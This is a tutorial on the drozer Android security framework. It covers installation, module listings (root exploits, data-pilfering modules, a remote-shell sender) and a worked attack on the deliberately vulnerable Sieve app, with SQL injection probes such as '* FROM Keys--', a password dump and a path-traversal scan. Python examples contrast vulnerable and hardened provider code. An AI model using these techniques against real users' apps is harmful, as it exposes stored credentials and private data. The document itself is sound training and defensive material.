DROZER: table of contents
DROZER
I. Installing drozer on Windows
II. Using drozer
III. drozer modules
    Find apps that can handle a given intent
    Find exported activities
    Start a given activity
IV. Worked example
V. Baidu Wallet app analysis
I. Installing drozer on Windows
1. Download and install the console: https://labs.mwrinfosecurity.com ... installer-2.3.4.zip
   Install the Agent on the device: https://labs.mwrinfosecurity.com ... zer-agent-2.3.4.apk
2. Open drozer Agent on the device and switch on its embedded server.
3. adb forward tcp:31415 tcp:31415
4. In the drozer directory run `drozer console connect`; seeing the banner means the connection succeeded. If the console instead reports a connection error, the usual causes are that the forward in step 3 was not set up or that the server in step 2 was never switched on.
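The following pre-flight script is an added example and is not part of drozer. It performs step 3 (the adb forward) and then checks that something on the device end is actually accepting connections on the forwarded port before `drozer console connect` is attempted. A refused connection means the Agent's server is still switched off; a failing adb command means no device is attached or USB debugging is off. The `adb` binary name and the port 31415 are the defaults used above; `open_local_listener` only exists so the reachability check can be exercised without a device.

```python
"""Pre-flight check before `drozer console connect` (added example, not drozer code)."""
import socket
import subprocess

DROZER_PORT = 31415  # port the drozer Agent listens on by default (step 3 above)


def forward_agent_port(port=DROZER_PORT, adb="adb"):
    """Run `adb forward tcp:<port> tcp:<port>`; True when adb exits successfully."""
    proc = subprocess.run([adb, "forward", "tcp:%d" % port, "tcp:%d" % port],
                          capture_output=True, text=True)
    return proc.returncode == 0


def agent_reachable(host="127.0.0.1", port=DROZER_PORT, timeout=2.0):
    """True if a TCP connection to host:port is accepted within timeout.

    After `adb forward`, 127.0.0.1:31415 on the workstation is the Agent's
    socket on the device; connection refused means its server is not running.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def open_local_listener():
    """Listening socket on an OS-chosen localhost port, used to self-test agent_reachable()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    if not forward_agent_port():
        raise SystemExit("adb forward failed: is the device attached with USB debugging enabled?")
    if not agent_reachable():
        raise SystemExit("nothing is accepting connections on tcp:%d: "
                         "switch the server on in the drozer Agent app" % DROZER_PORT)
    print("agent is reachable; now run: drozer console connect")
```

Run it instead of step 4 on a workstation where the console keeps failing to connect; the message it exits with points at the step that was skipped.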
II. Using drozer
General commands
usage: drozer [COMMAND]
Run `drozer [COMMAND] --help` for more usage information.
Commands:
  console   start the drozer Console
  module    manage drozer modules
  server    start a drozer Server
  ssl       manage drozer SSL key material
  exploit   generate an exploit to deploy drozer
  agent     create custom drozer Agents
  payload   generate payloads to deploy drozer
Module management
usage: module [COMMAND]
Run the drozer Module and Repository Manager.
The Repository Manager handles drozer Modules and Module Repositories.
positional arguments:
  command             the command to execute
  options
optional arguments:
  -h, --help
  -d, --descriptions  include descriptions when searching modules (search only)
  -f, --force         force install modules from the repositories (install only)
available commands:
  commands    shows a list of all console commands
  install     install a new module
  remote      manage the source repositories, from which you install modules
  repository  manage module repositories, on your local system
  search      search for modules
Install every module the repositories offer (Windows cmd.exe; inside a .bat file write %%i instead of %i). This also pulls in the exploit.* and root modules, so do it on a dedicated assessment machine:
for /F %i in ('drozer module search') do drozer module install %i
List the available exploit modules
E:\drozer>drozer exploit list
exploit.remote.browser.addjavascriptinterface               WebView addJavascriptInterface Remote Code Execution (CVE-2012-6636)
exploit.remote.browser.knoxsmdm                             Abuse the Newenrolment/UniversalMDMApplication application in Samsung Knox suite to install rogue drozer agent
exploit.remote.browser.nanparse                             Webkit Invalid NaN Parsing (CVE-2010-1807)
exploit.remote.browser.normalize                            Webkit Node Normalize (CVE-2010-1759)
exploit.remote.browser.useafterfree                         Webkit Use After Free Exploit (Black Hat 2010)
exploit.remote.dos.remotewipe_browserdelivery               Invoke a USSD code that performs a remote wipe on Samsung Galaxy SIII (Ekoparty 2012)
exploit.remote.fileformat.polarisviewerbof_browserdelivery  Deliver Polaris Viewer 4 exploit files over browser (Mobile Pwn2Own 2012)
exploit.remote.fileformat.polarisviewerbof_generate         Generate Polaris Viewer 4 exploit DOCX (Mobile Pwn2Own 2012)
exploit.remote.socialengineering.unknownsources             Deliver the Rogue drozer Agent over browser and hold thumbs the user will install it
exploit.usb.socialengineering.usbdebugging                  Install a Rogue drozer Agent on a connected device that has USB debugging enabled
Console main screen
E:\drozer>drozer console connect
Selecting 77dff31f0dc03413 (unknown Genymotion ('Phone' version) 2.3.7)
.. ..:.
..o.. .r..
..a.. . ....... . ..nd
ro..idsnemesisand..pr
.otectorandroidsneme.
.,sisandprotectorandroids+.
..nemesisandprotectorandroidsn:.
.emesisandprotectorandroidsnemes..
..isandp,..,rotectorandro,..,idsnem.
.isisandp..rotectorandroid..snemisis.
,andprotectorandroidsnemisisandprotec.
.torandroidsnemesisandprotectorandroid.
.snemisisandprotectorandroidsnemesisan:
.dprotectorandroidsnemesisandprotector.
drozer Console (v2.3.4)
dz> help
drozer: Android Security Assessment Framework
Type `help COMMAND` for more information on a particular command, or `help
MODULE` for a particular module.
Commands:
  cd  contributors  env  help  load  permissions  set  unset
  clean  echo  exit  list  module  run  shell
Miscellaneous help topics:
  Intents
load: execute a file as a script
module: manage the drozer modules that can be executed
run: execute a module
list: list the modules that can be executed
app.activity.forintent                                Find activities that can handle the given intent
app.activity.info                                     Gets information about exported activities.
app.activity.start                                    Start an Activity
app.broadcast.info                                    Get information about broadcast receivers
app.broadcast.send                                    Send broadcast using an intent
app.broadcast.sniff                                   Register a broadcast receiver that can sniff particular intents
app.package.attacksurface                             Get attack surface of package
app.package.backup                                    Lists packages that use the backup API (returns true on FLAG_ALLOW_BACKUP)
app.package.debuggable                                Find debuggable packages
app.package.info                                      Get information about installed packages
app.package.launchintent                              Get launch intent of package
app.package.list                                      List Packages
app.package.manifest                                  Get AndroidManifest.xml of package
app.package.native                                    Find Native libraries embedded in the application.
app.package.shareduid                                 Look for packages with shared UIDs
app.provider.columns                                  List columns in content provider
app.provider.delete                                   Delete from a content provider
app.provider.download                                 Download a file from a content provider that supports files
app.provider.finduri                                  Find referenced content URIs in a package
app.provider.info                                     Get information about exported content providers
app.provider.insert                                   Insert into a Content Provider
app.provider.query                                    Query a content provider
app.provider.read                                     Read from a content provider that supports files
app.provider.update                                   Update a record in a content provider
app.service.info                                      Get information about exported services
app.service.send                                      Send a Message to a service, and display the reply
app.service.start                                     Start Service
app.service.stop                                      Stop Service
auxiliary.develop.interactive                         Start an interactive Python shell
auxiliary.webcontentresolver                          Start a web service interface to content providers.
exploit.badauth.callme1                               Exploit CVE-2013-6272 to initiate or kill phone calls.
exploit.badauth.callme2                               Exploit CVE-2014-N/A to conduct phone calls or send special codes.
exploit.badauth.smsdraftsend                          Exploit CVE-2014-8610 Android < 5.0 SMS resend vulnerability (Baidu X-Team)
exploit.badauth.unlock                                Exploit CVE-2013-6271 to delete all locks on device.
exploit.jdwp.check                                    Open @jdwp-control and see which apps connect
exploit.pilfer.general.apnprovider                    Reads APN content provider
exploit.pilfer.general.settingsprovider               Reads Settings content provider
exploit.pilfer.oem.samsung.accuweather                Tests for Content Provider vulnerability in com.sec.android.widgetapp.weatherclock.
exploit.pilfer.oem.samsung.appassword                 Tests for vulnerability in content://settings/secure, that reveals Personal Hotspot AP password.
exploit.pilfer.oem.samsung.channelssms                Tests for Content Provider vulnerability in com.android.providers.telephony.
exploit.pilfer.oem.samsung.im                         Tests for Content Provider vulnerability in com.sec.android.im.
exploit.pilfer.oem.samsung.logs.email                 Tests for Content Provider vulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.logs.im                    Tests for Content Provider vulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.logs.messaging             Tests for Content Provider vulnerability in com.sec.android.provider.logsprovider.
exploit.pilfer.oem.samsung.memo                       Tests for Content Provider vulnerability in com.sec.android.app.memo.
exploit.pilfer.oem.samsung.minidiary                  Tests for Content Provider vulnerability in com.sec.android.app.minidiary.
exploit.pilfer.oem.samsung.postit                     Tests for Content Provider vulnerability in com.sec.android.widgetapp.postit.
exploit.pilfer.oem.samsung.social_hub.im              Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.impassword      Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.instantmessages Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.messages        Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.oem.samsung.social_hub.registeredaccounts
                                                      Tests for Content Provider vulnerability in com.seven.Z7.
exploit.pilfer.thirdparty.idea.superbackup.calls      Grab call logs exported by Super Backup
exploit.pilfer.thirdparty.idea.superbackup.contacts   Grab Contact details exported by Super Backup
exploit.pilfer.thirdparty.idea.superbackup.smses      Grab SMS messages exported by Super Backup
exploit.pilfer.thirdparty.inkpad.notes.list           Lists notes created with the InkPad application
exploit.pilfer.thirdparty.inkpad.notes.note           Reads notes created with the InkPad application.
exploit.pilfer.thirdparty.maildroid.emails            Grab Email messages from MailDroid
exploit.pilfer.thirdparty.seesmic.twitter.oauthtokens Extracts the Twitter Secret from Seesmic
exploit.pilfer.thirdparty.shazam.gps                  Extract GPS location information.
exploit.pilfer.thirdparty.sophos.mobilecontrol.messages
                                                      Steal the Messages database from Sophos Mobile Control
exploit.root.cmdclient                                Obtain a root shell on an Acer Iconia and various Motorola devices.
exploit.root.exynosmem                                Obtain a root shell on Samsung Galaxy S2, S3, Note 2 and some other devices.
exploit.root.huaweip2                                 Obtain a root shell on a Huawei P2.
exploit.root.mmap_abuse                               Iterate through all devices and attempt to exploit them to gain a root shell by abusing the mmap device operation.
exploit.root.towelroot                                Obtain a root shell on devices running Android 4.4 KitKat and/or kernel build date < Jun 3 2014.
exploit.root.ztesyncagent                             Obtain a root shell on a ZTE Score M and ZTE Skate.
information.datetime                                  Print Date/Time
information.deviceinfo                                Get verbose device information
information.permissions                               Get a list of all permissions used by packages on the device
intents.fuzzinozer                                    fuzzinozer
post.capture.clipboard                                Retrieve and display the current clipboard text.
post.capture.location                                 Get last known GPS coordinates of user
post.capture.screenrecording                          Take a video recording of the device's screen
post.capture.screenshot                               Take a screenshot of the device
post.perform.setclipboard                             Put the specified text into the clipboard.
post.perform.startinstalledagent                      Start installed drozer agent.
post.pivot.portforward                                Start a port forward
scanner.activity.browsable                            Get all BROWSABLE activities that can be invoked from the web browser
scanner.malware.virustotal                            Virus Scanner
scanner.misc.checkjavascriptbridge                    Check if addJavascriptInterface is used and can be abused
scanner.misc.native                                   Find native components included in packages
scanner.misc.readablefiles                            Find world-readable files in the given folder
scanner.misc.secretcodes                              Search for secret codes that can be used from the dialer
scanner.misc.securerandom                             SecureRandom Check
scanner.misc.sflagbinaries                            Find suid/sgid binaries in the given folder (default is /system).
scanner.misc.weburls                                  Find HTTP and HTTPS URLs specified in packages.
scanner.misc.writablefiles                            Find world-writable files in the given folder
scanner.oem.samsung                                   Test for multiple Samsung content provider vulnerabilities
scanner.provider.finduris                             Search for content providers that can be queried from our context.
scanner.provider.injection                            Test content providers for SQL injection vulnerabilities.
scanner.provider.sqltables                            Find tables accessible through SQL injection vulnerabilities.
scanner.provider.traversal                            Test content providers for basic directory traversal vulnerabilities.
scanner.root.check                                    Test for vulnerabilities that allow a malicious application to gain root access.
shell.exec                                            Execute a single Linux command.
shell.send                                            Send an ASH shell to a remote listener.
shell.start                                           Enter into an interactive Linux shell.
tools.file.download                                   Download a File
tools.file.md5sum                                     Get md5 Checksum of file
tools.file.size                                       Get size of file
tools.file.upload                                     Upload a File
tools.misc.installcert                                Install CA certificate
tools.setup.busybox                                   Install Busybox.
tools.setup.minimalsu                                 Prepare 'minimal-su' binary installation on the device.
tools.setup.nmap                                      Install Nmap.
tools.setup.sqlite3                                   Install SQLite3.
III. drozer modules
Find apps that can handle a given intent
usage: run app.activity.forintent [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
                                  [--component PACKAGE COMPONENT] [--data-uri DATA_URI]
                                  [--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
                                  [--mimetype MIMETYPE]
Find activities that can handle the formulated intent
Examples:
Find activities that can handle web addresses:
dz> run app.activity.forintent
        --action android.intent.action.VIEW
        --data http://www.google.com
Package name: com.android.browser
Target activity: com.android.browser.BrowserActivity
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
  -h, --help
  --action ACTION       specify the action to include in the Intent
  --category CATEGORY [CATEGORY ...]
                        specify the category to include in the Intent
  --component PACKAGE COMPONENT
                        specify the component name to include in the Intent
  --data-uri DATA_URI   specify a Uri to attach as data in the Intent
  --extra TYPE KEY VALUE
                        add a field to the Intent's extras bundle
  --flags FLAGS [FLAGS ...]
                        specify one-or-more flags to include in the Intent
  --mimetype MIMETYPE   specify the MIME type to send in the Intent
Find exported activities
usage: run app.activity.info [-h] [-a PACKAGE] [-f FILTER] [-i] [-u] [-v]
Gets information about exported activities.
Examples:
List activities exported by the Browser:
dz> run app.activity.info --package com.android.browser
Package: com.android.browser
com.android.browser.BrowserActivity
com.android.browser.ShortcutActivity
com.android.browser.BrowserPreferencesPage
com.android.browser.BookmarkSearch
com.android.browser.AddBookmarkPage
com.android.browser.widget.BookmarkWidgetConfigure
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
  -h, --help
  -a PACKAGE, --package PACKAGE
                        specify the package to inspect
  -f FILTER, --filter FILTER
                        specify a filter term for the activity name
  -i, --show-intent-filters
                        specify whether to include intent filters
  -u, --unexported      include activities that are not exported
  -v, --verbose         be verbose
Start a given activity
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
                              [--component PACKAGE COMPONENT] [--data-uri DATA_URI]
                              [--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
                              [--mimetype MIMETYPE]
Starts an Activity using the formulatedintent.
Examples:
Start the Browser with an explicit intent:
dz> run app.activity.start
        --component com.android.browser
                    com.android.browser.BrowserActivity
        --flags ACTIVITY_NEW_TASK
If no flags are specified, drozer will add the ACTIVITY_NEW_TASK flag. To launch
an activity with no flags:
dz> run app.activity.start
        --component com.android.browser
                    com.android.browser.BrowserActivity
        --flags 0x0
Starting the Browser with an implicit intent:
dz> run app.activity.start
        --action android.intent.action.VIEW
        --data-uri http://www.google.com
        --flags ACTIVITY_NEW_TASK
For more information on how to formulate anIntent, type 'help intents'.
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
  -h, --help
  --action ACTION       specify the action to include in the Intent
  --category CATEGORY [CATEGORY ...]
                        specify the category to include in the Intent
  --component PACKAGE COMPONENT
                        specify the component name to include in the Intent
  --data-uri DATA_URI   specify a Uri to attach as data in the Intent
  --extra TYPE KEY VALUE
                        add a field to the Intent's extras bundle
  --flags FLAGS [FLAGS ...]
                        specify one-or-more flags to include in the Intent
  --mimetype MIMETYPE   specify the MIME type to send in the Intent
IV. Worked example
1. Download and install the Sieve app: http://mwr.to/sieve
2. Find the package name
dz> run app.package.list -f sieve
com.mwr.example.sieve
3. Basic package information
dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/data/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-2.apk
UID: 10056
GID: [1028, 1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS
4. Find the attack surface
dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable
Attackable activities
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
com.mwr.example.sieve.MainLoginActivity
com.mwr.example.sieve.PWList
Attackable content providers
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  Authority: com.mwr.example.sieve.DBContentProvider
  Read Permission: null
  Write Permission: null
  Content Provider: com.mwr.example.sieve.DBContentProvider
  Multiprocess Allowed: True
  Grant Uri Permissions: False
  Path Permissions:
   Path: /Keys
    Type: PATTERN_LITERAL
    Read Permission: com.mwr.example.sieve.READ_KEYS
    Write Permission: com.mwr.example.sieve.WRITE_KEYS
  Authority: com.mwr.example.sieve.FileBackupProvider
  Read Permission: null
  Write Permission: null
  Content Provider: com.mwr.example.sieve.FileBackupProvider
  Multiprocess Allowed: True
  Grant Uri Permissions: False
Note that only the literal path /Keys of DBContentProvider is guarded by a permission; every other path of that provider, and all of FileBackupProvider, is readable and writable by any app on the device.
Try starting the activity directly:
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
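On a real engagement `app.provider.info` is run against many packages, so it pays to turn its output into a list of providers that are open by default, keeping track of which paths are still guarded. The script below is an added example and is not drozer code: it parses the text drozer prints (the constructed sample is the Sieve output quoted above, typed in as drozer shows it) and flags each provider whose top-level read or write permission is `null`. The output format is assumed to be the drozer 2.3.4 layout shown on this page.

```python
"""Triage helper for drozer `app.provider.info` output (added example, not drozer code)."""

# Constructed sample: the `run app.provider.info -a com.mwr.example.sieve`
# output quoted in this walkthrough, as drozer prints it.
SIEVE_PROVIDER_INFO = """\
Package: com.mwr.example.sieve
  Authority: com.mwr.example.sieve.DBContentProvider
  Read Permission: null
  Write Permission: null
  Content Provider: com.mwr.example.sieve.DBContentProvider
  Multiprocess Allowed: True
  Grant Uri Permissions: False
  Path Permissions:
   Path: /Keys
    Type: PATTERN_LITERAL
    Read Permission: com.mwr.example.sieve.READ_KEYS
    Write Permission: com.mwr.example.sieve.WRITE_KEYS

  Authority: com.mwr.example.sieve.FileBackupProvider
  Read Permission: null
  Write Permission: null
  Content Provider: com.mwr.example.sieve.FileBackupProvider
  Multiprocess Allowed: True
  Grant Uri Permissions: False
"""


def parse_provider_info(text):
    """Turn drozer's key/value listing into one dict per Authority.

    'Read Permission'/'Write Permission' lines that follow a 'Path:' line
    belong to that path; otherwise they are the provider's defaults.
    A permission of 'null' is stored as None (no permission required).
    """
    providers, current, path = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Authority":
            current = {"authority": value, "read": None, "write": None, "paths": []}
            providers.append(current)
            path = None
        elif current is None:
            continue  # 'Package:' header or noise before the first provider
        elif key == "Path":
            path = {"path": value, "type": None, "read": None, "write": None}
            current["paths"].append(path)
        elif key == "Type" and path is not None:
            path["type"] = value
        elif key in ("Read Permission", "Write Permission"):
            field = "read" if key.startswith("Read") else "write"
            target = path if path is not None else current
            target[field] = None if value == "null" else value
        # Content Provider / Multiprocess Allowed / Grant Uri Permissions: not needed here
    return providers


def triage(providers):
    """One finding per provider that any app can read or write by default."""
    findings = []
    for p in providers:
        open_access = [a for a in ("read", "write") if p[a] is None]
        if not open_access:
            continue
        guarded = sorted(pp["path"] for pp in p["paths"] if pp["read"] or pp["write"])
        findings.append({
            "uri": "content://%s/" % p["authority"],
            "open": open_access,          # which operations need no permission
            "guarded_paths": guarded,     # paths that still carry a permission
        })
    return findings


if __name__ == "__main__":
    for f in triage(parse_provider_info(SIEVE_PROVIDER_INFO)):
        print("%s  open for %s  guarded paths: %s"
              % (f["uri"], "/".join(f["open"]), ", ".join(f["guarded_paths"]) or "none"))
```

Each flagged URI is a candidate for `app.provider.query` and for the `scanner.provider.*` modules used in step 5. A guarded path is not a complete defence: the path permission only protects that literal URI, while the SQL behind the unguarded paths usually runs against the same database.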
5. Attack the content provider
Query the Passwords path, which carries no read permission:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
        --vertical
_id: 1
service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==(Base64-encoded)
email: incognitoguy50@gmail.com
SQL injection. A single quote in either the projection or the selection produces an SQLite syntax error whose text reveals how the provider builds its query: the projection is pasted straight after SELECT and the selection straight into the WHERE clause, unescaped.
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
        --projection "'"
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT '
FROM Passwords
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
        --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords
WHERE (')
Content provider weaknesses found by the scanners
dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
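To see why both probes fail the way they do, and what the fix looks like, the block below models the provider's query() in Python with sqlite3. This is an added example, not Sieve's source and not drozer code: the query shapes `SELECT <projection> FROM Passwords` and `... WHERE (<selection>)` are taken from the error messages above, while the table layout, the row, and the `Keys` table with its columns are constructed stand-ins (Sieve's real second table and columns are not shown on this page). The vulnerable version reproduces both drozer errors and lets the projection reach a different table; the hardened version whitelists columns, restricts the selection to `column OP ?` predicates and binds values as parameters, which is what SQLiteQueryBuilder with setProjectionMap(), setStrict(true) and selectionArgs gives you on Android.

```python
"""Vulnerable vs hardened content-provider query() (added example, not Sieve's code)."""
import re
import sqlite3


def make_db():
    """Constructed stand-in for Sieve's database; the Keys table is assumed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE Passwords(_id INTEGER PRIMARY KEY, service TEXT,
                               username TEXT, password TEXT, email TEXT);
        CREATE TABLE Keys(Password TEXT, pin TEXT);   -- assumed name and columns
        INSERT INTO Passwords VALUES(1, 'Email', 'incognitoguy50',
            'PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==', 'incognitoguy50@gmail.com');
        INSERT INTO Keys VALUES('assumed-master-password', '1234');
    """)
    return db


def query_vulnerable(db, projection=None, selection=None, selection_args=()):
    """Builds SQL the way the drozer errors above show Sieve doing it."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM Passwords" % cols
    if selection:
        sql += " WHERE (%s)" % selection
    return sql, db.execute(sql, tuple(selection_args)).fetchall()


ALLOWED_COLUMNS = {"_id", "service", "username", "password", "email"}
PREDICATE = re.compile(r"^(\w+) (=|<>|<|>|LIKE) \?$")   # column OP ? only


def query_hardened(db, projection=None, selection=None, selection_args=()):
    """Projection map, restricted selection grammar, bound arguments."""
    cols = list(projection) if projection else sorted(ALLOWED_COLUMNS)
    unknown = [c for c in cols if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError("projection not in map: %r" % unknown)
    sql = "SELECT %s FROM Passwords" % ", ".join(cols)
    params = tuple(selection_args)
    if selection:
        preds = [p.strip() for p in selection.split(" AND ")]
        for p in preds:
            m = PREDICATE.match(p)
            if not m or m.group(1) not in ALLOWED_COLUMNS:
                raise ValueError("selection rejected: %r" % p)
        if len(preds) != len(params):
            raise ValueError("placeholder/argument count mismatch")
        sql += " WHERE (%s)" % " AND ".join(preds)
    return sql, db.execute(sql, params).fetchall()


def probe(db, query_fn, **kwargs):
    """Run one query the way drozer would and report the rows or the error text."""
    try:
        sql, rows = query_fn(db, **kwargs)
        return {"sql": sql, "rows": rows, "error": None}
    except (sqlite3.Error, ValueError) as exc:
        return {"sql": None, "rows": None, "error": str(exc)}


if __name__ == "__main__":
    db = make_db()
    for fn in (query_vulnerable, query_hardened):
        print(fn.__name__)
        print("  --projection \"'\"          ->", probe(db, fn, projection=["'"]))
        print("  --selection \"'\"           ->", probe(db, fn, selection="'"))
        print("  --projection '* FROM Keys--' ->", probe(db, fn, projection=["* FROM Keys--"]))
```

The third probe is the practical consequence of "Injection in Projection": a projection of `* FROM Keys--` turns the statement into `SELECT * FROM Keys-- FROM Passwords`, so the unguarded /Passwords/ path reads whatever table the injected name points at, path permission on /Keys notwithstanding. The hardened version rejects it before any SQL is compiled.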
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
content://com.mwr.example.sieve.FileBackupProvider/
content://com.mwr.example.sieve.FileBackupProvider
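The traversal finding means FileBackupProvider's openFile() treats the path component of the content URI as a filesystem path. The block below is an added example, not Sieve's code: one openFile() stand-in that does exactly that, beside one that resolves the path inside a fixed directory and refuses anything that escapes it. All files live in a temporary directory constructed by the script, so nothing outside it is read.

```python
"""Path traversal in a file-backed provider, vulnerable vs confined (added example, not Sieve's code)."""
import os
import tempfile


def open_file_vulnerable(backup_dir, uri_path):
    """Sieve-style: whatever path the content URI carries is the file that gets opened,
    so content://<authority>/etc/hosts hands back /etc/hosts."""
    with open(uri_path, "rb") as f:
        return f.read()


def open_file_hardened(backup_dir, uri_path):
    """Resolve the URI path inside backup_dir and refuse anything that escapes it."""
    base = os.path.realpath(backup_dir)
    target = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, target]) != base:      # symlinks and '..' already resolved
        raise PermissionError("path escapes backup dir: %r" % uri_path)
    with open(target, "rb") as f:
        return f.read()


def build_fixture():
    """Constructed layout: <tmp>/backup/notes.txt (allowed) and <tmp>/secret.txt (outside)."""
    root = tempfile.mkdtemp()
    backup = os.path.join(root, "backup")
    os.mkdir(backup)
    with open(os.path.join(backup, "notes.txt"), "wb") as f:
        f.write(b"app's own backup")
    with open(os.path.join(root, "secret.txt"), "wb") as f:
        f.write(b"outside the provider's directory")
    return root, backup


def demo():
    """Exercise both openFile() variants against the constructed layout."""
    root, backup = build_fixture()
    secret = os.path.join(root, "secret.txt")
    results = {
        "vulnerable": open_file_vulnerable(backup, secret),        # reads outside the app
        "hardened_inside": open_file_hardened(backup, "/notes.txt"),
    }
    try:
        open_file_hardened(backup, "/../secret.txt")
        results["hardened_traversal"] = "opened"
    except PermissionError:
        results["hardened_traversal"] = "refused"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print("%-20s %r" % (name, value))
```

On Android the same check is done against the directory returned by getFilesDir() (or wherever the provider keeps its files) before calling ParcelFileDescriptor.open(); the realpath step matters because a symlink inside the allowed directory is another way out of it.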
6. Attack the services
dz> run app.service.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.AuthService
Permission: null
com.mwr.example.sieve.CryptoService
Permission: null